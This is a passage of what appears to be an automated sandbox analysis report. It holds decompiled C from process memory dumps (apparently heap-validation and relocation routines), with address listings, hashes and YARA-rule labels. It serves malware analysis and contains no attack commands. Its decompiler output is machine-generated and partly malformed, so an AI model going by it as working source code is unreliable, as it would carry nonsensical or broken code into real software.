						switch( *((intOrPtr*)(_t547 * 4 +  &M0092CFC0))) {
							case 0:
								goto L47;
							case 1:
								goto L44;
							case 2:
								goto L68;
							case 3:
								goto L64;
							case 4:
								goto L60;
							case 5:
								goto L57;
							case 6:
								goto L53;
							case 7:
								goto L49;
							case 8:
								goto L72;
							case 9:
								goto L76;
							case 0xa:
								goto L81;
							case 0xb:
								goto L89;
							case 0xc:
								goto L85;
							case 0xd:
								goto L94;
							case 0xe:
								goto L98;
							case 0xf:
								goto L111;
						}
						L47:
						_t194 =  &_a8;
						 *_t194 = _a8 - _t546;
						_t547 = 0x10;
						_a12 = _t547;
					} while ( *_t194 != 0);
					L48:
					return 0;
				}
			}














































                                                0x0092d005
                                                0x0092d00a
                                                0x0092d00b
                                                0x0092d010
                                                0x0092d01b
                                                0x0092d01e
                                                0x0092cec4
                                                0x0092cec7
                                                0x0092cecc
                                                0x0092cfaa
                                                0x0092cfaa
                                                0x0092cfaf
                                                0x0092cfb8
                                                0x0092cfb8
                                                0x00000000
                                                0x0092cfaf
                                                0x0092ced2
                                                0x0092cee2
                                                0x0092cee8
                                                0x0092ceec
                                                0x0092cef8
                                                0x0092cf00
                                                0x0092cf06
                                                0x0092cf18
                                                0x0092cf1e
                                                0x0092cf08
                                                0x0092cf0d
                                                0x0092cf12
                                                0x0092cf12
                                                0x0092cf22
                                                0x0092cf25
                                                0x0092cf2c
                                                0x0092cf3a
                                                0x0092cf49
                                                0x0092cf4e
                                                0x0092cf68
                                                0x0092cf70
                                                0x0092cf74
                                                0x00000000
                                                0x0092cf74
                                                0x0092cf3c
                                                0x00000000
                                                0x0092cf2e
                                                0x0092cf31
                                                0x0092cf43
                                                0x0092cf43
                                                0x0092cf77
                                                0x0092cf7a
                                                0x0092cf81
                                                0x0092cf87
                                                0x0092cf97
                                                0x0092cf97
                                                0x0092cf99
                                                0x0092cf9a
                                                0x0092cf9d
                                                0x0092cf9e
                                                0x0092cfa1
                                                0x0092cfa4
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0092cfa4
                                                0x0092cf8c
                                                0x0092cf92
                                                0x00000000
                                                0x00000000
                                                0x0092cf94
                                                0x0092cf96
                                                0x00000000
                                                0x0092cf96
                                                0x0092cf2c
                                                0x00000000
                                                0x0092d024
                                                0x0092d024
                                                0x0092d029
                                                0x009442bd
                                                0x0092d02f
                                                0x0092d02f
                                                0x0092d031
                                                0x0092d031
                                                0x0092d034
                                                0x0092d039
                                                0x0092d03b
                                                0x0092d03b
                                                0x0092d040
                                                0x0092d045
                                                0x0092d048
                                                0x0092d04b
                                                0x0092d051
                                                0x0092d054
                                                0x00942a1b
                                                0x00942a21
                                                0x00942a25
                                                0x00942a29
                                                0x00942a2c
                                                0x00942a33
                                                0x0094531f
                                                0x00942a4a
                                                0x00942a54
                                                0x00942a57
                                                0x00942a5f
                                                0x00942a65
                                                0x00942a69
                                                0x00942a70
                                                0x0092cbbc
                                                0x00942a76
                                                0x00942a7a
                                                0x0092cbc4
                                                0x0092cbc7
                                                0x0092cbed
                                                0x00942a80
                                                0x00942a80
                                                0x00942a80
                                                0x00942a7a
                                                0x00942a91
                                                0x009326f0
                                                0x009326fe
                                                0x00932702
                                                0x00932709
                                                0x0093272e
                                                0x0093271c
                                                0x00932726
                                                0x009326ae
                                                0x009326bc
                                                0x009326c0
                                                0x009326c7
                                                0x009442b5
                                                0x009326cd
                                                0x009326d1
                                                0x0092cc28
                                                0x0092cc51
                                                0x009326d7
                                                0x009326d7
                                                0x009326d7
                                                0x009326d1
                                                0x009326e8
                                                0x0093262b
                                                0x00932639
                                                0x0093263d
                                                0x00932644
                                                0x009326a9
                                                0x00932657
                                                0x00932661
                                                0x00932664
                                                0x00932672
                                                0x00932676
                                                0x0093267d
                                                0x009410d9
                                                0x00932683
                                                0x00932687
                                                0x0092cc8c
                                                0x0092ccb5
                                                0x0093268d
                                                0x0093268d
                                                0x0093268d
                                                0x00932687
                                                0x0093269e
                                                0x009325d4
                                                0x009325e2
                                                0x009325e6
                                                0x009325ed
                                                0x009410b3
                                                0x00932604
                                                0x0093260e
                                                0x00932515
                                                0x00932523
                                                0x00932527
                                                0x0093252e
                                                0x00943e43
                                                0x00932534
                                                0x00932538
                                                0x0092ccf0
                                                0x0092cd19
                                                0x0093253e
                                                0x0093253e
                                                0x0093253e
                                                0x00932538
                                                0x0093254f
                                                0x009324d3
                                                0x009324e1
                                                0x009324e5
                                                0x009324ec
                                                0x009325a7
                                                0x00932503
                                                0x0093250d
                                                0x00932334
                                                0x00932342
                                                0x00932346
                                                0x0093234d
                                                0x00943def
                                                0x00932364
                                                0x0093236e
                                                0x00932371
                                                0x0093237f
                                                0x00932383
                                                0x0093238a
                                                0x00943dfa
                                                0x009323a1
                                                0x009323ab
                                                0x009323ae
                                                0x009323bc
                                                0x009323c0
                                                0x009323c7
                                                0x009323d0
                                                0x0092cdb8
                                                0x0092cdbc
                                                0x0092cdca
                                                0x0092cdf3
                                                0x0092cdbe
                                                0x0092cdbe
                                                0x0092cdbe
                                                0x0092cdbc
                                                0x009323dd
                                                0x009323e0
                                                0x009323ee
                                                0x009323f2
                                                0x009323f9
                                                0x00943e05
                                                0x009323ff
                                                0x00932403
                                                0x0092cdfc
                                                0x0092ce25
                                                0x00932409
                                                0x00932409
                                                0x00932409
                                                0x00932403
                                                0x0093241a
                                                0x0093241d
                                                0x0093242b
                                                0x0093242f
                                                0x00932436
                                                0x00943e10
                                                0x0093243c
                                                0x00932440
                                                0x0092ce2e
                                                0x0092ce57
                                                0x00932446
                                                0x00932446
                                                0x00932446
                                                0x00932440
                                                0x00932457
                                                0x0093245a
                                                0x00932468
                                                0x0093246c
                                                0x00932473
                                                0x00943e1b
                                                0x00932479
                                                0x0093247d
                                                0x0092ce60
                                                0x0092ce89
                                                0x00932483
                                                0x00932483
                                                0x00932483
                                                0x0093247d
                                                0x00932494
                                                0x0092d061
                                                0x0092d069
                                                0x0092d06f
                                                0x0092d073
                                                0x0092d07a
                                                0x00940aa6
                                                0x0092ce92
                                                0x0092ce95
                                                0x0092cebb
                                                0x00940aac
                                                0x00940aac
                                                0x00940aac
                                                0x0092d080
                                                0x0092d083
                                                0x0092d083
                                                0x0092d090
                                                0x0092d093
                                                0x00000000
                                                0x0092d093
                                                0x00932394
                                                0x0093239a
                                                0x0092cd86
                                                0x0092cd86
                                                0x0092cdaf
                                                0x0092cdaf
                                                0x00000000
                                                0x00932394
                                                0x00932357
                                                0x0093235d
                                                0x0092cd54
                                                0x0092cd54
                                                0x0092cd7d
                                                0x0092cd7d
                                                0x00000000
                                                0x00932357
                                                0x009324f6
                                                0x009324fc
                                                0x0092cd22
                                                0x0092cd22
                                                0x0092cd4b
                                                0x0092cd4b
                                                0x00000000
                                                0x009324f6
                                                0x009325f7
                                                0x009325fd
                                                0x0092ccbe
                                                0x0092ccbe
                                                0x0092cce7
                                                0x0092cce7
                                                0x00000000
                                                0x009325f7
                                                0x0093264a
                                                0x00932650
                                                0x0092cc5a
                                                0x0092cc5a
                                                0x0092cc83
                                                0x0092cc83
                                                0x00000000
                                                0x0093264a
                                                0x0093270f
                                                0x00932715
                                                0x0092cbf6
                                                0x0092cbf6
                                                0x0092cc1f
                                                0x0092cc1f
                                                0x00000000
                                                0x0093270f
                                                0x00942a3d
                                                0x00942a43
                                                0x0092cb87
                                                0x0092cb87
                                                0x0092cb8a
                                                0x0092cbb0
                                                0x0092cbb0
                                                0x00000000
                                                0x00942a3d
                                                0x0092d05a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0092d096
                                                0x0092d096
                                                0x0092d096
                                                0x0092d09b
                                                0x0092d09c
                                                0x0092d09c
                                                0x0092d0a1
                                                0x0092d0a7
                                                0x0092d0a7

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2149474689.00000000008E0000.00000040.00000001.sdmp, Offset: 008D0000, based on PE: true
                                                • Associated: 00000007.00000002.2149468638.00000000008D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149692494.00000000009C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149700219.00000000009D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149713288.00000000009D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149723271.00000000009D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149730125.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149841483.0000000000A40000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 257753672f73e7abbd43567407ed083a8d4322aa5a62add3d2440a5d3e9cd213
                                                • Instruction ID: d44a1b225b4d6f8f54a8aa654d9cbcfc25123dfe2f6c9b5bfede1f676a721e1a
                                                • Opcode Fuzzy Hash: 257753672f73e7abbd43567407ed083a8d4322aa5a62add3d2440a5d3e9cd213
                                                • Instruction Fuzzy Hash: 8A91F4B2919326CBCB208F05D4905B93BA2FFA4751B65806EFD814B391D774C9A1EBE0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0099F8EE, Relevance: .2, Instructions: 188COMMONCrypto
                                                Download Yara Rule
                                                C-Code - Quality: 64%
                                                			E0099F8EE(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t81;
				intOrPtr _t83;
				signed int _t87;
				signed char _t92;
				intOrPtr _t93;
				signed short _t96;
				intOrPtr* _t97;
				signed short* _t100;
				signed int _t101;
				signed short _t102;
				intOrPtr* _t103;
				intOrPtr* _t104;
				intOrPtr _t120;
				void* _t132;

				_push(0x18);
				_push(0x8fd0f0);
				E008FDF5C(__ebx, __edi, __esi);
				 *(_t132 - 0x1c) =  *(_t132 - 0x1c) & 0x00000000;
				if(E009026AA() == 0) {
					 *(_t132 - 4) =  *(_t132 - 4) & 0x00000000;
					_t120 =  *((intOrPtr*)(_t132 + 8));
					_t81 =  *(_t132 + 0xc);
					if(( *_t81 &  *(_t120 + 0x4c)) != 0) {
						L33:
						_t83 =  *((intOrPtr*)(_t132 - 0x20));
					} else {
						 *(_t132 - 0x1c) = 0xa;
						if(( *(_t120 + 0x40) & 0x04000000) != 0 ||  *(_t81 + 3) == ( *(_t81 + 2) ^  *(_t81 + 1) ^  *_t81)) {
							 *(_t132 - 0x1c) = 1;
							_t92 =  *((intOrPtr*)(_t81 + 6));
							if(_t92 == 0) {
								_t83 = _t120;
							} else {
								_t83 = (_t81 & 0xffff0000) - ((_t92 & 0x000000ff) - 1 << 0x10);
							}
							 *((intOrPtr*)(_t132 - 0x20)) = _t83;
							if( *((intOrPtr*)(_t83 + 8)) == 0xffeeffee) {
								_t93 =  *((intOrPtr*)(_t81 + 7));
								if(_t93 == 4) {
									L12:
									 *(_t132 - 0x1c) = 3;
									if(_t93 != 3) {
										_t111 =  *_t81 & 0x0000ffff;
										 *(_t132 - 0x1c) = 6;
										__eflags = ( *(_t120 + 0x54) ^  *(_t81 + ( *_t81 & 0xffff) * 8 + 4)) - _t111;
										if(__eflags == 0) {
											goto L22;
										}
									} else {
										_t103 = _t81 + 8;
										_t111 =  *(_t103 + 0x10);
										if((_t111 & 0x00000fff) == 0 && _t111 >=  *((intOrPtr*)(_t83 + 0x1c)) &&  *((intOrPtr*)(_t103 + 0x14)) + _t111 <=  *((intOrPtr*)(_t83 + 0x28))) {
											 *(_t132 - 0x1c) = 4;
											_t111 =  *( *(_t103 + 4));
											if(_t111 ==  *((intOrPtr*)( *_t103 + 4)) && _t111 == _t103) {
												 *(_t132 - 0x1c) = 5;
												_t104 = _t103 + 8;
												_t111 =  *( *(_t104 + 4));
												if(_t111 ==  *((intOrPtr*)( *_t104 + 4)) && _t111 == _t104) {
													L22:
													 *(_t132 - 0x1c) = 7;
													_t96 =  *(_t120 + 0x54) & 0x0000ffff;
													_t111 =  *(_t81 + 4) & 0x0000ffff;
													if((_t111 ^ _t96) == 0) {
														L29:
														 *(_t132 - 0x1c) = 8;
														if(( *(_t81 + 2) & 0x00000001) != 0) {
															L32:
															 *(_t132 - 0x1c) = 9;
														} else {
															_t97 = _t81 + 8;
															_t111 =  *( *(_t97 + 4));
															if(_t111 ==  *((intOrPtr*)( *_t97 + 4)) && _t111 == _t97) {
																goto L32;
															}
														}
													} else {
														_t100 = _t81 - ((_t111 & 0x0000ffff ^ _t96 & 0x0000ffff) << 3);
														if( *(_t120 + 0x4c) == 0) {
															_t101 =  *_t100 & 0x0000ffff;
														} else {
															_t102 =  *_t100;
															 *(_t132 - 0x28) = _t102;
															if(( *(_t120 + 0x4c) & _t102) != 0) {
																_t102 = _t102 ^  *(_t120 + 0x50);
																 *(_t132 - 0x28) = _t102;
															}
															_t101 = _t102 & 0x0000ffff;
															_t83 =  *((intOrPtr*)(_t132 - 0x20));
														}
														_t111 =  *(_t120 + 0x54) ^  *(_t81 + 4);
														if(_t101 == ( *(_t120 + 0x54) ^  *(_t81 + 4))) {
															goto L29;
														}
													}
												}
											}
										}
									}
								} else {
									 *(_t132 - 0x1c) = 2;
									if(_t81 >=  *((intOrPtr*)(_t83 + 0x1c)) && _t81 <  *((intOrPtr*)(_t83 + 0x28)) &&  *((intOrPtr*)(_t83 + 0x18)) == _t120) {
										goto L12;
									}
								}
							}
						} else {
							goto L33;
						}
					}
					 *(_t132 - 4) = 0xfffffffe;
					if( *(_t120 + 0x4c) != 0) {
						 *(_t81 + 3) =  *(_t81 + 2) ^  *(_t81 + 1) ^  *_t81;
						 *_t81 =  *_t81 ^  *(_t120 + 0x50);
					}
					_t87 =  *(_t132 - 0x1c);
					_t162 = _t87 - 0xa;
					if(_t87 > 0xa) {
						L44:
						_push(0);
						_push(0);
						_push(_t87);
						_push(_t81);
						_push(_t120);
						_push(2);
					} else {
						_t74 = _t87 + 0x99fb6a; // 0x2010000
						_t111 =  *_t74 & 0x000000ff;
						switch( *((intOrPtr*)(( *_t74 & 0x000000ff) * 4 +  &M0099FB52))) {
							case 0:
								_push(0);
								_push(0);
								_push(_t87);
								_push(_t81);
								_push(_t120);
								_push(3);
								goto L45;
							case 1:
								_push(__esi);
								_push(__esi);
								_push( *((intOrPtr*)(__ebx + 0x18)));
								_push(__eax);
								_push(__edi);
								_push(0xb);
								goto L45;
							case 2:
								_push(__esi);
								_push(__esi);
								_push(3);
								_push(__eax);
								_push(__edi);
								_push(__esi);
								goto L45;
							case 3:
								_push(__esi);
								_push(__esi);
								_push(__ecx);
								_push(__eax);
								_push(__edi);
								_push(0xd);
								goto L45;
							case 4:
								_push(__esi);
								_push(__esi);
								_push(8);
								_push(__eax);
								_push(__edi);
								_push(0xc);
								goto L45;
							case 5:
								goto L44;
						}
					}
					L45:
					_t79 = E0099F840(_t83, _t87, _t111, _t120, 0, _t162);
				}
				return E008FDFA1(_t79);
			}

















                                                0x0099f8ee
                                                0x0099f8f0
                                                0x0099f8f5
                                                0x0099f8fa
                                                0x0099f905
                                                0x0099f90b
                                                0x0099f90f
                                                0x0099f915
                                                0x0099f91a
                                                0x0099fab5
                                                0x0099fab5
                                                0x0099f920
                                                0x0099f920
                                                0x0099f92e
                                                0x0099f941
                                                0x0099f948
                                                0x0099f94d
                                                0x0099f962
                                                0x0099f94f
                                                0x0099f95e
                                                0x0099f95e
                                                0x0099f964
                                                0x0099f96e
                                                0x0099f974
                                                0x0099f97a
                                                0x0099f99e
                                                0x0099f99e
                                                0x0099f9a8
                                                0x0099fa16
                                                0x0099fa1f
                                                0x0099fa2e
                                                0x0099fa31
                                                0x00000000
                                                0x00000000
                                                0x0099f9aa
                                                0x0099f9aa
                                                0x0099f9ad
                                                0x0099f9b6
                                                0x0099f9d3
                                                0x0099f9df
                                                0x0099f9e4
                                                0x0099f9f2
                                                0x0099f9f9
                                                0x0099fa01
                                                0x0099fa06
                                                0x0099fa37
                                                0x0099fa37
                                                0x0099fa3e
                                                0x0099fa42
                                                0x0099fa4d
                                                0x0099fa8c
                                                0x0099fa8c
                                                0x0099fa97
                                                0x0099faac
                                                0x0099faac
                                                0x0099fa99
                                                0x0099fa99
                                                0x0099faa1
                                                0x0099faa6
                                                0x00000000
                                                0x00000000
                                                0x0099faa6
                                                0x0099fa4f
                                                0x0099fa5c
                                                0x0099fa62
                                                0x0099fa7c
                                                0x0099fa64
                                                0x0099fa64
                                                0x0099fa66
                                                0x0099fa6c
                                                0x0099fa6e
                                                0x0099fa71
                                                0x0099fa71
                                                0x0099fa74
                                                0x0099fa77
                                                0x0099fa77
                                                0x0099fa83
                                                0x0099fa8a
                                                0x00000000
                                                0x00000000
                                                0x0099fa8a
                                                0x0099fa4d
                                                0x0099fa06
                                                0x0099f9e4
                                                0x0099f9b6
                                                0x0099f97c
                                                0x0099f97c
                                                0x0099f986
                                                0x00000000
                                                0x00000000
                                                0x0099f986
                                                0x0099f97a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0099f92e
                                                0x0099fab8
                                                0x0099fae6
                                                0x0099faf0
                                                0x0099faf6
                                                0x0099faf6
                                                0x0099faf8
                                                0x0099fafb
                                                0x0099fafe
                                                0x0099fb3e
                                                0x0099fb3e
                                                0x0099fb3f
                                                0x0099fb40
                                                0x0099fb41
                                                0x0099fb42
                                                0x0099fb43
                                                0x0099fb00
                                                0x0099fb00
                                                0x0099fb00
                                                0x0099fb07
                                                0x00000000
                                                0x0099fb0e
                                                0x0099fb0f
                                                0x0099fb10
                                                0x0099fb11
                                                0x0099fb12
                                                0x0099fb13
                                                0x00000000
                                                0x00000000
                                                0x0099fb17
                                                0x0099fb18
                                                0x0099fb19
                                                0x0099fb1c
                                                0x0099fb1d
                                                0x0099fb1e
                                                0x00000000
                                                0x00000000
                                                0x0099fb22
                                                0x0099fb23
                                                0x0099fb24
                                                0x0099fb26
                                                0x0099fb27
                                                0x0099fb28
                                                0x00000000
                                                0x00000000
                                                0x0099fb2b
                                                0x0099fb2c
                                                0x0099fb2d
                                                0x0099fb2e
                                                0x0099fb2f
                                                0x0099fb30
                                                0x00000000
                                                0x00000000
                                                0x0099fb34
                                                0x0099fb35
                                                0x0099fb36
                                                0x0099fb38
                                                0x0099fb39
                                                0x0099fb3a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0099fb07
                                                0x0099fb45
                                                0x0099fb45
                                                0x0099fb45
                                                0x0099fb4f

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2149474689.00000000008E0000.00000040.00000001.sdmp, Offset: 008D0000, based on PE: true
                                                • Associated: 00000007.00000002.2149468638.00000000008D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149692494.00000000009C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149700219.00000000009D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149713288.00000000009D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149723271.00000000009D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149730125.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149841483.0000000000A40000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 78e64635d7c9c265a74c81cc30954984ccd1667f8b5a39dbf3b04ef930b9ad46
                                                • Instruction ID: 78f937dfe611159f3ac4c17c89b8d10fba4f1ecd1f04a789fe11495fd8d1e8ae
                                                • Opcode Fuzzy Hash: 78e64635d7c9c265a74c81cc30954984ccd1667f8b5a39dbf3b04ef930b9ad46
                                                • Instruction Fuzzy Hash: 0961E3319012219FDF248F19C478FBBFBB9EF55715F5980A8D448AB291D3389851CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0094A37B, Relevance: .2, Instructions: 175COMMONCrypto
                                                Download Yara Rule
                                                C-Code - Quality: 96%
                                                			E0094A37B(signed short* __ecx, intOrPtr _a4, intOrPtr _a8, signed int _a12, signed int _a16, signed int _a20) {
				signed int _v12;
				signed int _t79;
				unsigned int _t84;
				signed int _t85;
				signed short* _t88;
				intOrPtr* _t91;

				_t88 = __ecx;
				_push(__ecx);
				_push(__ecx);
				if(_a8 == 0) {
					L13:
					_t79 = _a12;
				} else {
					while(1) {
						L9:
						_t84 =  *_a12 & 0x0000ffff;
						_a8 = _a8 - 1;
						_t91 = (_t84 & 0x00000fff) + _a4;
						_t85 = _t84 >> 0xc;
						if(_t85 > 0xa) {
							break;
						}
						switch( *((intOrPtr*)(_t85 * 4 +  &M0094A34A))) {
							case 0:
								L12:
								_a12 = _a12 + 2;
								if(_a8 != 0) {
									goto L9;
								} else {
									goto L13;
								}
								goto L14;
							case 1:
								_t82 = (( *_t88 & 0x0000ffff) << 0x10) + _t92;
								goto L2;
							case 2:
								 *__ecx =  *__ecx + __dx;
								goto L12;
							case 3:
								 *_t91 =  *_t91 + _t92;
								goto L12;
							case 4:
								__eax =  *__ecx & 0x0000ffff;
								__esi = __esi + 1;
								__esi = __esi + 1;
								_a8 = _a8 - 1;
								_a12 = __esi;
								__esi =  *__esi;
								__eax = ( *__ecx & 0x0000ffff) << 0x10;
								_t6 = (( *__ecx & 0x0000ffff) << 0x10) + __edx + 0x8000; // 0x8004
								__eax = __esi + _t6;
								L2:
								 *_t88 = _t82 >> 0x10;
								goto L12;
							case 5:
								__eax =  *__ecx;
								__esi = 0x3ffffff;
								__edi = __eax;
								__edi = __eax & 0x03ffffff;
								__edi = __edx + (__eax & 0x03ffffff) * 4;
								__edi = __edx + (__eax & 0x03ffffff) * 4 >> 2;
								__edi = __edx + (__eax & 0x03ffffff) * 0x00000004 >> 0x00000002 ^ __eax;
								__edi = (__edx + (__eax & 0x03ffffff) * 0x00000004 >> 0x00000002 ^ __eax) & 0x03ffffff;
								__edi = (__edx + (__eax & 0x03ffffff) * 0x00000004 >> 0x00000002 ^ __eax) & 0x03ffffff ^ __eax;
								 *__ecx = (__edx + (__eax & 0x03ffffff) * 0x00000004 >> 0x00000002 ^ __eax) & 0x03ffffff ^ __eax;
								goto L12;
							case 6:
								goto L15;
							case 7:
								__edi = 0;
								__ecx = __ecx & 0xfffffff0;
								__eax =  *(__ecx + 0xc);
								__edx =  *(__ecx + 8);
								__esi = __eax;
								__esi = __eax >> 0x1b;
								__edi = (0 << 0x00000020 | __esi) << 0x17;
								_v12 = __edx;
								__esi = __esi << 0x17;
								__esi = __esi | __edx;
								 *(__ecx + 4) =  *(__ecx + 4) >> 0x18;
								__ebx = 0;
								__edi = (__edi << 0x00000020 | __esi) << 8;
								__esi = __esi << 8;
								__esi = __esi |  *(__ecx + 4) >> 0x00000018;
								__edx =  *(__ecx + 4);
								__edi = (__edi << 0x00000020 | __esi) << 0xa;
								 *(__ecx + 4) >> 0xe =  *(__ecx + 4) >> 0x0000000e & 0x000003ff;
								__esi = __esi << 0xa;
								__esi = __esi |  *(__ecx + 4) >> 0x0000000e & 0x000003ff;
								__edi = (__edi << 0x00000020 | __esi) << 1;
								__eax = __eax >> 0xc;
								__edx = __eax >> 0x0000000c & 0x00000001;
								__esi = __esi + __esi;
								__esi = __esi | __eax >> 0x0000000c & 0x00000001;
								__edi = (__edi << 0x00000020 | __esi) << 5;
								__eax = __eax >> 0xd;
								__edx = __eax >> 0x0000000d & 0x0000001f;
								__esi = __esi << 5;
								__esi = __esi | __eax >> 0x0000000d & 0x0000001f;
								__edi = (__edi << 0x00000020 | __esi) << 9;
								__edx = __eax;
								__edx = __eax >> 0x12;
								__eax = __eax >> 4;
								__edx = __edx & 0x000001ff;
								__eax = __eax & 0x0000007f;
								__esi = __esi << 9;
								__esi = __esi | __edx;
								__edx = __edi;
								__edx = (__edi << 0x00000020 | __esi) << 7;
								__edi = 0;
								__esi = __esi << 7;
								__esi = __esi | __eax;
								__esi = __esi + _a16;
								asm("adc edx, [ebp+0x18]");
								__eax = __esi;
								__edi = __edx;
								__eax = (__edi << 0x00000020 | __esi) >> 0x16;
								__eax = (__edi << 0x00000020 | __esi) >> 0x16 & 0x000003ff;
								__edx = __edx << 0xa;
								__eax = __eax | __edx << 0x0000000a;
								__edi =  *(__ecx + 4);
								__eax = __eax << 0xe;
								__edi =  *(__ecx + 4) & 0x00003fff;
								 *(__ecx + 4) = __eax;
								__edx = __edx >> 8;
								__eax = __edx >> 0x00000008 ^ _v12;
								__edi = __esi;
								(__edx >> 0x00000008 ^ _v12) & 0x007fffff = (__edx >> 0x00000008 ^ _v12) & 0x007fffff ^ _v12;
								 *(__ecx + 8) = (__edx >> 0x00000008 ^ _v12) & 0x007fffff ^ _v12;
								__edx = __edx >> 0x1f;
								__edx >> 0x0000001f & 0x00000001 = (__edx >> 0x0000001f & 0x00000001) << 9;
								__ebx = __edx;
								__edi = (__ebx << 0x00000020 | __esi) >> 7;
								__edi = (__ebx << 0x00000020 | __esi) >> 0x7 & 0x000001ff;
								__eax = (__edx >> 0x0000001f & 0x00000001) << 0x00000009 | (__ebx << 0x00000020 | __esi) >> 0x7 & 0x000001ff;
								__ebx = __ebx >> 7;
								__ebx = __edx;
								__edi = __esi;
								__edi = (__ebx << 0x00000020 | __esi) >> 0x10;
								__eax = __eax << 5;
								__edi = (__ebx << 0x00000020 | __esi) >> 0x10 & 0x0000001f;
								__eax = __eax | (__ebx << 0x00000020 | __esi) >> 0x10 & 0x0000001f;
								__edi = __esi;
								__edi = (__edx << 0x00000020 | __esi) >> 0x15;
								__eax = __eax + __eax;
								__edi = (__edx << 0x00000020 | __esi) >> 0x15 & 0x00000001;
								__eax = __eax | (__edx << 0x00000020 | __esi) >> 0x15 & 0x00000001;
								__edx =  *(__ecx + 0xc);
								__eax = __eax << 8;
								__esi = __esi & 0x0000007f;
								__eax = __eax | __esi;
								__edx =  *(__ecx + 0xc) & 0xf000080f;
								__eax = __eax << 4;
								__ebx = __ebx >> 0x10;
								__eax = __eax |  *(__ecx + 0xc) & 0xf000080f;
								__edx = _a16;
								 *(__ecx + 0xc) = __eax;
								goto L12;
							case 8:
								 *__ecx =  *__ecx + __edx;
								__eax = _a20;
								asm("adc [ecx+0x4], eax");
								goto L12;
						}
					}
					L15:
					_t79 = 0;
				}
				L14:
				return _t79;
			}









                                                0x0094a37b
                                                0x0094a380
                                                0x0094a381
                                                0x0094a389
                                                0x0094a3bd
                                                0x0094a3bd
                                                0x0094a38b
                                                0x0094a38e
                                                0x0094a38e
                                                0x0094a391
                                                0x0094a394
                                                0x0094a39f
                                                0x0094a3a2
                                                0x0094a3a8
                                                0x00000000
                                                0x00000000
                                                0x0094a3aa
                                                0x00000000
                                                0x0094a3b3
                                                0x0094a3b3
                                                0x0094a3bb
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0094a1b0
                                                0x00000000
                                                0x00000000
                                                0x0094a1d9
                                                0x00000000
                                                0x00000000
                                                0x0094a3b1
                                                0x00000000
                                                0x00000000
                                                0x0094a1bd
                                                0x0094a1c0
                                                0x0094a1c1
                                                0x0094a1c2
                                                0x0094a1c5
                                                0x0094a1c8
                                                0x0094a1cb
                                                0x0094a1d0
                                                0x0094a1d0
                                                0x0094a1b2
                                                0x0094a1b5
                                                0x00000000
                                                0x00000000
                                                0x0094a32f
                                                0x0094a331
                                                0x0094a336
                                                0x0094a338
                                                0x0094a33a
                                                0x0094a33d
                                                0x0094a340
                                                0x0094a342
                                                0x0094a344
                                                0x0094a346
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0094a1e1
                                                0x0094a1e3
                                                0x0094a1e6
                                                0x0094a1e9
                                                0x0094a1ec
                                                0x0094a1ee
                                                0x0094a1f1
                                                0x0094a1f5
                                                0x0094a1f8
                                                0x0094a201
                                                0x0094a206
                                                0x0094a209
                                                0x0094a20d
                                                0x0094a211
                                                0x0094a214
                                                0x0094a216
                                                0x0094a21b
                                                0x0094a222
                                                0x0094a228
                                                0x0094a22b
                                                0x0094a22f
                                                0x0094a235
                                                0x0094a238
                                                0x0094a23d
                                                0x0094a23f
                                                0x0094a241
                                                0x0094a247
                                                0x0094a24c
                                                0x0094a24f
                                                0x0094a252
                                                0x0094a254
                                                0x0094a258
                                                0x0094a25c
                                                0x0094a25f
                                                0x0094a262
                                                0x0094a268
                                                0x0094a26b
                                                0x0094a26e
                                                0x0094a270
                                                0x0094a272
                                                0x0094a276
                                                0x0094a27a
                                                0x0094a27d
                                                0x0094a27f
                                                0x0094a282
                                                0x0094a285
                                                0x0094a287
                                                0x0094a289
                                                0x0094a28d
                                                0x0094a297
                                                0x0094a29a
                                                0x0094a29c
                                                0x0094a29f
                                                0x0094a2a2
                                                0x0094a2aa
                                                0x0094a2af
                                                0x0094a2b2
                                                0x0094a2b5
                                                0x0094a2bc
                                                0x0094a2bf
                                                0x0094a2c4
                                                0x0094a2ca
                                                0x0094a2cd
                                                0x0094a2cf
                                                0x0094a2d3
                                                0x0094a2d9
                                                0x0094a2db
                                                0x0094a2de
                                                0x0094a2e0
                                                0x0094a2e2
                                                0x0094a2e6
                                                0x0094a2e9
                                                0x0094a2ec
                                                0x0094a2ee
                                                0x0094a2f0
                                                0x0094a2f4
